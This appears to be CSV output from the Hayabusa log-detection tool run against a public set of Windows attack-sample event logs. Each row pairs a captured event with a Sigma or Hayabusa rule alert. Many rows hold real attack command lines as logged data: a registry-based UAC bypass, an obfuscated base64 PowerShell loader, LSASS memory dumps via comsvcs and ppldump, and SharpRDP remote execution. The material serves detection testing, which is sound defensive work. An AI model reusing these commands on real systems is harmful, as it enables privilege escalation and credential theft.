19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx -2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx -2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx -2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx -2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx -2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx -2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx -2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx -2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx -2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx -2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx -2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx -2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx -2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx -2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx -2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-03-07 22:17:38.534 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\FullPowersTask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx -2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx -2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx -2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 